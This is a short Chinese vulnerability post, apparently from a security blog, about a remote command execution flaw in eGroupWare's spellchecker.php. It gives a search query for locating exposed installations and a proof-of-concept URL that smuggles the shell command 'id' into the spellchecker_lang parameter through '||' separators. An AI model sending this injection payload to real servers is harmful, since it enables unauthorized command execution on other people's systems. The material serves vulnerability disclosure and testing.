eGroupWare spellchecker.php 远程命令执行漏洞

# eGroupWare spellchecker.php 远程命令执行漏洞 ## 漏洞描述 *eGroupWare*是一个多用户,在以PHP为基础的API上的定制集为基础开发的,以WEB为基础的工作件套装,其中 spellchecker.php...

eGroupWare spellchecker.php 远程命令执行漏洞

漏洞描述

eGroupWare是一个多用户,在以PHP为基础的API上的定制集为基础开发的,以WEB为基础的工作件套装,其中 spellchecker.php 文件中存在命令执行漏洞

漏洞影响

eGroupWare

网络测绘

app="EGROUPWARE-产品"

漏洞复现

登录页面

img

验证POC

/egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl%7C%7Cid%7C%7C

img

  • 发表于 2024-07-12 18:45:54
  • 阅读 ( 2222 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

带头大哥

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!

站长统计